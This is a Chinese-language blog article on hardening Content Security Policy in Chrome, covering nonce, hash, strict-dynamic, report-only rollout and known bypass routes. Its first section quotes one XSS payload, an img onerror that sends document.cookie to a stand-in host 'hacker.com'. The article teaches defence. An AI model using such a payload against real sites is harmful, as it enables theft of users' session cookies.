配置了 CSP 依然被 XSS 打穿问题往往不在攻击有多高明而在于你始终舍不得删掉那两个词unsafe-inline、unsafe-eval。真正的强安全 CSP从来不是妥协的产物而是一套从策略设计到工程落地的完整体系。上一篇我们讲到CSP 用白名单机制从源头扭转了浏览器 “默认信任一切脚本” 的危险逻辑。很多同学看完立刻动手配置却很快陷入同一个困境页面直接瘫痪。内联事件不执行、动态脚本加载失败、第三方 SDK 报错、前端框架打包后的代码无法运行。于是为了业务能跑起来几乎所有人都会下意识加上unsafe-inlineunsafe-eval结果就是CSP 看上去配了XSS 该打穿还是打穿。这不是 CSP 没用而是你用了一个 “自欺欺人” 的半吊子策略。在 Chrome 安全体系里CSP 的真正威力从来不在基础白名单而在进阶能力nonce、hash、strict-dynamic、report-only、trusted-types……它们共同构成了一套既能兼容业务又能彻底封杀内联脚本的实战方案。这一篇我们告别入门配置走进企业级 CSP 的真实世界如何在不牺牲业务的前提下干掉 unsafe-inline让 CSP 从 “摆设” 变成真正的 XSS 终极防线。同时我们也会揭开 CSP 被绕过的常见场景看懂攻防两端的真实博弈。一、为什么 unsafe-inline 是 CSP 最大的毒瘤很多人对这两个关键字抱有侥幸我只是临时用用问题不大。现实是只要开启 unsafe-inline你的 CSP 对 XSS 基本无效。Chrome 在解析 CSP 时一旦看到unsafe-inline就会直接放行页面中所有内联script代码所有 onload、onclick、onerror 等内联事件所有通过 javascript: 伪协议执行的代码而这恰好是绝大多数 XSS 漏洞的攻击载体。黑客只需要注入html预览img srcx onerrorfetch(hacker.com/steal?cdocument.cookie)浏览器会心安理得地执行CSP 形同虚设。更致命的是unsafe-inline 无法通过白名单精细控制它是一个全局开关。你要么全开要么全关。这也是为什么大厂与安全规范里统一要求线上环境严禁出现 unsafe-inline 和 unsafe-eval。二、CSP 进阶武器一nonce —— 一次性令牌精准放行合法脚本想要彻底禁用内联又要让必要的脚本正常运行Chrome 给出的第一个标准答案是nonce。1. nonce 原理nonce 即 “number used once”一次性随机令牌。工作流程非常简单服务端每次响应生成一个强随机、不可预测的字符串在 CSP 头中声明script-src nonce-你的随机串在页面合法的内联 script 标签上加上nonce你的随机串Chrome 只执行带有正确 nonce 的脚本其余内联一律拦截黑客即便注入脚本也不可能预知服务端生成的随机 nonce代码无法执行。2. 真实可用配置示例httpContent-Security-Policy: default-src self; script-src nonce-2e45a67890bcdEf123456 self; object-src none; base-uri self;页面内脚本html预览script nonce2e45a67890bcdEf123456 // 合法执行 /script注入的恶意脚本html预览scriptalert(1)/script直接被 Chrome 拒绝执行。三、CSP 进阶武器二hash —— 指纹校验锁定固定代码片段如果你不方便在服务端动态生成 nonce比如纯静态页面Chrome 还提供了第二种方案hash。1. hash 原理提前计算合法内联脚本内容的 SHA256/SHA384/SHA512 哈希值在 CSP 中声明该哈希浏览器只执行哈希匹配的内联脚本不匹配则拦截这种方式不需要服务端参与纯前端即可实现强安全。2. 典型使用场景html预览scriptconsole.log(业务必需的初始化代码)/script计算这段代码的 SHA256 哈希后httpscript-src sha256-abc123xyz... self;任何篡改、注入的脚本哈希都不匹配直接拦截。四、CSP 终级形态strict-dynamic —— 信任链传递兼容现代前端nonce 和 hash 解决了内联问题但面对现代前端依然不够webpack 动态加载、ES module 异步加载、第三方 SDK 懒加载……如果每一个脚本都要手动加白名单配置会膨胀到无法维护。于是 CSP3 引入了strict-dynamic它是企业级 CSP 的灵魂。1. strict-dynamic 做了什么一句话信任已经被信任的脚本所加载的脚本。只要根脚本通过 nonce/hash 认证那么它动态创建、加载的子脚本自动获得信任无需再加入白名单。这完美适配React / Vue / Angular 等现代框架微前端、懒加载、异步组件合法第三方 SDK 动态加载2. 强安全且高兼容模板httpContent-Security-Policy: default-src self; script-src nonce-#{random} strict-dynamic; style-src sha256-#{hash}; img-src self data:; connect-src self; object-src none; base-uri self; form-action self;这是谷歌、Facebook 等大厂内部广泛使用的 CSP 结构。五、CSP 不是万能的常见绕过场景与防御思路理解 CSP 的弱点才能真正用好它。在真实攻防中CSP 常见被绕过的路径有CSP 配置缺失或不完整只配了 script-src没管 object-src、frame-src、base-uriunsafe-eval 配合 DOM 操作绕过利用 innerHTML 插入可执行资源触发间接执行第三方资源被劫持白名单里的第三方 JS 被黑导致整个信任体系失守利用 CSP 上报机制泄露信息通过 report-uri 嗅探页面内容防御核心思路只有一条最小权限原则 完整指令集 禁止高危关键字 配合 trusted-types六、无痛上线report-only 模式让 CSP 落地零风险很多人不敢上严格 CSP是怕直接阻断业务。Chrome 早就提供了完美方案Content-Security-Policy-Report-Only它只上报违规不拦截执行。你可以在上线前收集所有违规资源逐步完善白名单、nonce、hash确认无业务影响后再切到强制拦截模式这是企业级落地 CSP 的标准流程。本篇小结CSP 的真正价值不在于 “配了”而在于 “配得强”。从基础白名单到 nonce/hash再到 strict-dynamic是一个从简单限制到信任链体系的进化过程。当你彻底告别 unsafe-inlineCSP 才真正成为 Chrome 内容安全的第一道硬闸。它不再是防火墙的补充而是前端 XSS 防御的基石。到这里CSP 两篇完结。我们完成了从原理到实战、从入门到企业级的完整闭环。而在 Chrome 安全体系中CSP 只是页面内容层面的防护。浏览器真正的底层铠甲是进程级别的隔离机制Sandbox。下篇预告Chrome 安全机制深度解析三沙盒乾坤Chrome Sandbox 进程隔离如何把网页锁进笼子里如果说 CSP 是限制网页 “能做什么”那 Sandbox 就是限制网页 “能碰什么”。从多进程架构到权限剥离Chrome 用一套操作系统级的隔离机制让恶意网页无法伤害你的电脑。